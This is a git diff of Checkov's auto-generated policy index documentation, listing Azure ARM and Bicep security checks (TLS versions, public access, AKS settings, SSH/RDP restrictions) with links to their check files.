+| 137 | CKV_AZURE_153 | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                 | arm   | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                       |
+| 138 | CKV_AZURE_153 | resource  | Microsoft.Web/sites/slots                                                    | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                 | arm   | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                       |
+| 139 | CKV_AZURE_155 | resource  | Microsoft.Web/sites                                                          | Ensure debugging is disabled for the App service slot                                                        | arm   | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                               |
+| 140 | CKV_AZURE_155 | resource  | Microsoft.Web/sites/slots                                                    | Ensure debugging is disabled for the App service slot                                                        | arm   | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                               |
+| 141 | CKV_AZURE_157 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                       | arm   | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py)                                 |
+| 142 | CKV_AZURE_158 | resource  | Microsoft.Databricks/workspaces                                              | Ensure Databricks Workspace data plane to control plane communication happens over private link              | arm   | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py)                                                         |
+| 143 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that HTTP (port 80) access is restricted from the internet                                            | arm   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                               |
+| 144 | CKV_AZURE_160 | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that HTTP (port 80) access is restricted from the internet                                            | arm   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                               |
+| 145 | CKV_AZURE_163 | resource  | Microsoft.ContainerRegistry/registries                                       | Enable vulnerability scanning for container images.                                                          | arm   | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py)                                                                       |
+| 146 | CKV_AZURE_166 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure container image quarantine, scan, and mark images verified                                            | arm   | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py)                                                                     |
+| 147 | CKV_AZURE_168 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                          | arm   | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                   |
+| 148 | CKV_AZURE_168 | resource  | Microsoft.ContainerService/managedClusters/agentPools                        | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                          | arm   | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py)                                                                                   |
+| 149 | CKV_AZURE_169 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                   | arm   | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py)                                                                           |
+| 150 | CKV_AZURE_171 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster upgrade channel is chosen                                                                 | arm   | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py)                                                                                   |
+| 151 | CKV_AZURE_172 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                     | arm   | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py)                                                                         |
+| 152 | CKV_AZURE_173 | resource  | Microsoft.ApiManagement/service                                              | Ensure API management uses at least TLS 1.2                                                                  | arm   | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py)                                                                           |
+| 153 | CKV_AZURE_174 | resource  | Microsoft.ApiManagement/service                                              | Ensure API management public access is disabled                                                              | arm   | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py)                                                                   |
+| 154 | CKV_AZURE_175 | resource  | Microsoft.SignalRService/webPubSub                                           | Ensure Web PubSub uses a SKU with an SLA                                                                     | arm   | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py)                                                                                             |
+| 155 | CKV_AZURE_176 | resource  | Microsoft.SignalRService/webPubSub                                           | Ensure Web PubSub uses managed identities to access Azure resources                                          | arm   | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSpecifyIdentity.py)                                                                           |
+| 156 | CKV_AZURE_177 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Windows VM enables automatic updates                                                                  | arm   | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                           |
+| 157 | CKV_AZURE_177 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Windows VM enables automatic updates                                                                  | arm   | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMAutomaticUpdates.py)                                                                           |
+| 158 | CKV_AZURE_178 | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure linux VM enables SSH with keys for secure communication                                               | arm   | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                         |
+| 159 | CKV_AZURE_178 | resource  | Microsoft.Compute/virtualMachines                                            | Ensure linux VM enables SSH with keys for secure communication                                               | arm   | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/LinuxVMUsesSSH.py)                                                                                         |
+| 160 | CKV_AZURE_182 | resource  | Microsoft.Network/networkInterfaces                                          | Ensure that VNET has at least 2 connected DNS Endpoints                                                      | arm   | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                               |
+| 161 | CKV_AZURE_182 | resource  | Microsoft.Network/virtualNetworks                                            | Ensure that VNET has at least 2 connected DNS Endpoints                                                      | arm   | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetSingleDNSServer.py)                                                                               |
+| 162 | CKV_AZURE_183 | resource  | Microsoft.Network/virtualNetworks                                            | Ensure that VNET uses local DNS addresses                                                                    | arm   | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VnetLocalDNS.py)                                                                                             |
+| 163 | CKV_AZURE_189 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that Azure Key Vault disables public network access                                                   | arm   | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py)                                               |
+| 164 | CKV_AZURE_191 | resource  | Microsoft.EventGrid/topics                                                   | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                  | arm   | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py)                                           |
+| 165 | CKV_AZURE_192 | resource  | Microsoft.EventGrid/topics                                                   | Ensure that Azure Event Grid Topic local Authentication is disabled                                          | arm   | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py)                                                   |
+| 166 | CKV_AZURE_193 | resource  | Microsoft.EventGrid/topics                                                   | Ensure public network access is disabled for Azure Event Grid Topic                                          | arm   | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py)                                                               |
+| 167 | CKV_AZURE_206 | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage Accounts use replication                                                                 | arm   | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsUseReplication.py)                                                           |
+| 168 | CKV_AZURE_208 | resource  | Microsoft.Search/searchServices                                              | Ensure that Azure Cognitive Search maintains SLA for index updates                                           | arm   | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAIndex.py)                                                                               |
+| 169 | CKV_AZURE_209 | resource  | Microsoft.Search/searchServices                                              | Ensure that Azure Cognitive Search maintains SLA for search index queries                                    | arm   | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py)                                                                 |
+| 170 | CKV_AZURE_212 | resource  | Microsoft.Web/sites                                                          | Ensure App Service has a minimum number of instances for failover                                            | arm   | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                   |
+| 171 | CKV_AZURE_212 | resource  | Microsoft.Web/sites/slots                                                    | Ensure App Service has a minimum number of instances for failover                                            | arm   | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py)                                                                   |
+| 172 | CKV_AZURE_213 | resource  | Microsoft.Web/sites                                                          | Ensure that App Service configures health check                                                              | arm   | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                     |
+| 173 | CKV_AZURE_213 | resource  | Microsoft.Web/sites/slots                                                    | Ensure that App Service configures health check                                                              | arm   | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py)                                                                     |
+| 174 | CKV_AZURE_216 | resource  | Microsoft.Network/azureFirewalls                                             | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                      | arm   | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py)                                                     |
+| 175 | CKV_AZURE_218 | resource  | Microsoft.Network/applicationGateways                                        | Ensure Application Gateway defines secure protocols for in transit communication                             | arm   | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py)                                                               |
+| 176 | CKV_AZURE_222 | resource  | Microsoft.Web/sites                                                          | Ensure that Azure Web App public network access is disabled                                                  | arm   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 177 | CKV_AZURE_222 | resource  | Microsoft.Web/sites/config                                                   | Ensure that Azure Web App public network access is disabled                                                  | arm   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 178 | CKV_AZURE_222 | resource  | Microsoft.Web/sites/slots                                                    | Ensure that Azure Web App public network access is disabled                                                  | arm   | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py)                                                         |
+| 179 | CKV_AZURE_223 | resource  | Microsoft.EventHub/namespaces                                                | Ensure Event Hub Namespace uses at least TLS 1.2                                                             | arm   | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py)                                                                   |
+| 180 | CKV_AZURE_225 | resource  | Microsoft.Web/serverfarms                                                    | Ensure the App Service Plan is zone redundant                                                                | arm   | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py)                                                               |
+| 181 | CKV_AZURE_226 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure ephemeral disks are used for OS disks                                                                 | arm   | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py)                                                                               |
+| 182 | CKV_AZURE_227 | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm   | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                 |
+| 183 | CKV_AZURE_227 | resource  | Microsoft.ContainerService/managedClusters/agentPools                        | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm   | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py)                                                                 |
+| 184 | CKV_AZURE_229 | resource  | Microsoft.Sql/servers/databases                                              | Ensure the Azure SQL Database Namespace is zone redundant                                                    | arm   | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py)                                                                     |
+| 185 | CKV_AZURE_233 | resource  | Microsoft.ContainerRegistry/registries                                       | Ensure Azure Container Registry (ACR) is zone redundant                                                      | arm   | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                       |
+| 186 | CKV_AZURE_233 | resource  | Microsoft.ContainerRegistry/registries/replications                          | Ensure Azure Container Registry (ACR) is zone redundant                                                      | arm   | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py)                                                                       |
+| 187 | CKV_AZURE_236 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable local authentication                                         | arm   | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py)                                                     |
+| 188 | CKV_AZURE_238 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                     | arm   | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py)                                                 |
+| 189 | CKV_AZURE_239 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure Azure Synapse Workspace administrator login password is not exposed                                   | arm   | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                     |
+| 190 | CKV_AZURE_240 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure Azure Synapse Workspace is encrypted with a CMK                                                       | arm   | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py)                                                           |
+| 191 | CKV_AZURE_242 | resource  | Microsoft.Synapse/workspaces/bigDataPools                                    | Ensure isolated compute is enabled for Synapse Spark pools                                                   | arm   | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py)                                             |
+| 192 | CKV_AZURE_243 | resource  | Microsoft.MachineLearningServices/workspaces                                 | Ensure Azure Machine learning workspace is configured with private endpoint                                  | arm   | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py)                                                       |
+| 193 | CKV2_AZURE_19 | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                      | arm   | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py)               |
+| 194 | CKV2_AZURE_23 | resource  | Microsoft.AppPlatform/Spring                                                 | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                          | arm   | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml)                                                 |
+| 195 | CKV2_AZURE_27 | resource  | Microsoft.Sql/servers                                                        | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                              | arm   | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py)                                                                               |
+| 196 | CKV2_AZURE_46 | resource  | Microsoft.Synapse/workspaces/vulnerabilityAssessments                        | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                      | arm   | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py)                                                     |
+| 197 | CKV2_AZURE_48 | resource  | Microsoft.Databricks/workspaces                                              | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                      | arm   | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
+| 198 | CKV2_AZURE_49 | resource  | Microsoft.MachineLearningServices/workspaces                                 | Ensure that Azure Machine learning workspace is not configured with overly permissive network access         | arm   | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml)                                                   |
 
 
 ---
diff --git a/docs/5.Policy Index/bicep.md b/docs/5.Policy Index/bicep.md
index 190f90f7f33..c16568748db 100644
--- a/docs/5.Policy Index/bicep.md	
+++ b/docs/5.Policy Index/bicep.md	
@@ -6,104 +6,208 @@ nav_order: 1
 
 # bicep resource scans (auto generated)
 
-|    | Id            | Type      | Entity                                                                       | Policy                                                                                                       | IaC   | Resource Link                                                                                                                                                                      |
-|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-|  0 | CKV_AZURE_1   | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                 | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                 |
-|  1 | CKV_AZURE_2   | resource  | Microsoft.Compute/disks                                                      | Ensure Azure managed disk have encryption enabled                                                            | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                       |
-|  2 | CKV_AZURE_3   | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                      | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py)               |
-|  3 | CKV_AZURE_4   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS logging to Azure Monitoring is Configured                                                         | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                         |
-|  4 | CKV_AZURE_5   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure RBAC is enabled on AKS clusters                                                                       | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                               |
-|  5 | CKV_AZURE_6   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS has an API Server Authorized IP Ranges enabled                                                    | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                               |
-|  6 | CKV_AZURE_7   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster has Network Policy configured                                                             | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                           |
-|  7 | CKV_AZURE_8   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Kubernetes Dashboard is disabled                                                                      | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                   |
-|  8 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that RDP access is restricted from the internet                                                       | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                       |
-|  9 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that RDP access is restricted from the internet                                                       | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                       |
-| 10 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that SSH access is restricted from the internet                                                       | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                       |
-| 11 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that SSH access is restricted from the internet                                                       | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                       |
-| 12 | CKV_AZURE_11  | resource  | Microsoft.Sql/servers                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                             |
-| 13 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 14 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 15 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 16 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 17 | CKV_AZURE_13  | resource  | Microsoft.Web/sites/config                                                   | Ensure App Service Authentication is set on Azure App Service                                                | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                           |
-| 18 | CKV_AZURE_13  | resource  | config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                           |
-| 19 | CKV_AZURE_14  | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                      | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                     |
-| 20 | CKV_AZURE_15  | resource  | Microsoft.Web/sites                                                          | Ensure web app is using the latest version of TLS encryption                                                 | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                             |
-| 21 | CKV_AZURE_16  | resource  | Microsoft.Web/sites                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                   | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                       |
-| 22 | CKV_AZURE_17  | resource  | Microsoft.Web/sites                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                              | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                     |
-| 23 | CKV_AZURE_18  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                          | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                           |
-| 24 | CKV_AZURE_19  | resource  | Microsoft.Security/pricings                                                  | Ensure that standard pricing tier is selected                                                                | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                 |
-| 25 | CKV_AZURE_20  | resource  | Microsoft.Security/securityContacts                                          | Ensure that security contact 'Phone number' is set                                                           | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                       |
-| 26 | CKV_AZURE_21  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                             |
-| 27 | CKV_AZURE_22  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                 |
-| 28 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                 |
-| 29 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/auditingSettings                                       | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                 |
-| 30 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                 |
-| 31 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases/auditingSettings                             | Ensure that 'Auditing' is set to 'On' for SQL servers                                                        | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                 |
-| 32 | CKV_AZURE_24  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                   | Bicep | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                           |
